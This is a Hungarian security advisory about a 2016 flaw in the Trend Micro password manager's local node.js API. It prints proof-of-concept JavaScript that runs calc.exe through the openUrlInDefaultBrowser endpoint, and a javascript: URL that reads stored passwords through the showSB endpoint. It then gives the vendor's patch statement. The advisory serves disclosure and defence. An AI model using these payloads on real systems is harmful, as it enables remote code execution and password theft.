Trend Micro Antivirus sérülékenysége


2016. január 12. 07:41

CH azonosító

CH-12926

Angol cím

Trend Micro Antivirus vulnerability

Felfedezés dátuma

2016.01.10.

Súlyosság

Magas

Érintett rendszerek

Anti-Virus
Trend Micro

Érintett verziók

Trend Micro Antivirus

Összefoglaló

A Trend Micro Antivirus sérülékenysége vált ismerté, melyet kihasználva a támadó tetszőleges kódot futtathat.

Leírás

A sérülékenységet az alapértelemezett jelszókezelő komponens hibája okozza, mely JavaScriptben íródott node.js-el, és HTTP RPC portokat nyit meg az API kérések kezeléséhez. Az openUrlInDefaultBrowser() függvény segítségével egy támadó tetszőleges kódot futtathat egy weboldalon keresztül, mint ahogy az alábbi példán is látható:

x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
try { x.send(); } catch (e) {};

 

Egy második hiba miatt a pedig támadónak lehetősége nyílik megszerezni a jelszókezelőben tárolt jelszavakat az alábbi híváson keresztül:

https://localhost:49155/api/showSB?url=javascript:topWindow.process.mainModule.exports.Tower.handle.getUserData(function(n){alert(JSON.parse(n).data.passcard[0].Domain)})'

 

Továbbá a Trend Micro terméke önaláírt tanúsítványt helyez el a számítógép tanúsítványtárában.

Update 2016.01.13:

A Trend Micro tájékozatatta központunkat, hogy: “a hírekben szereplő, kritikus sérülékenységet kijavítottuk a Trend Micro Password Manager összes felhasználója számára. Szabványos tényfeltáró vizsgálatunk során meggyőződtünk róla, hogy a probléma egyedül a Trend Micro Password Manager lakossági piacra szánt változatát érintette, az üzleti és nagyvállalati termékekben nem jelentkezett. “
“2016. január 11-én kötelező érvényű frissítést bocsátottunk ki a Trend Micro ActiveUpdate szolgáltatásán keresztül, amely kijavítja a sérülékenységet: ezt minden felhasználónak telepítenie kell. Fontos tudni, hogy a Trend Micro Password Manager esetében az  ActiveUpdate frissítéseket nem lehet kikapcsolni, ami azt jelenti, hogy a Trend Micro Password Manager minden jelenlegi felhasználója automatikusan megkapja az ActiveUpdate frissítéseket. A jelentett, kritikus sérülékenység gyakorlatilag a Trend Micro Password Manager régi, ma már nem elérhető verzióját érinti.”

Tájékoztattak továbbá hogy nincs tudomásuk róla, hogy ez idő alatt bárkit a sérülékenységet kihasználó támadás ért volna.

Megoldás

Frissítsen a legújabb verzióra

Támadás típusa

execute arbitrary code

Hatás

Loss of confidentiality (Bizalmasság elvesztése)
Loss of integrity (Sértetlenség elvesztése)

Szükséges hozzáférés

Remote/Network (Távoli/hálózat)

Hivatkozások

Egyéb referencia: code.google.com
Egyéb referencia: www.zdnet.com

Legfrissebb sérülékenységek
CVE-2023-4863 – Google Chrome sérülékenysége
CVE-2023-40186 – FreeRDP sérülékenysége
CVE-2023-20890 – VMware Aria Operations For Networks sérülékenysége
CVE-2023-34039 – VMware Aria Operations for Networks sérülékenysége
CVE-2023-23770 – Motorola MBTS Site Controller sérülékenysége
CVE-2023-38388 – JupiterX Core Premium WordPress Plugin sérülékenysége
CVE-2023-38831 – RARLabs WinRAR sérülékenysége
CVE-2023-38035 – Ivanti Sentry sérülékenysége
CVE-2023-20212 – ClamAV sérülékenysége
CVE-2023-36847 – Juniper Networks Junos OS sérülékenysége
Tovább a sérülékenységekhez »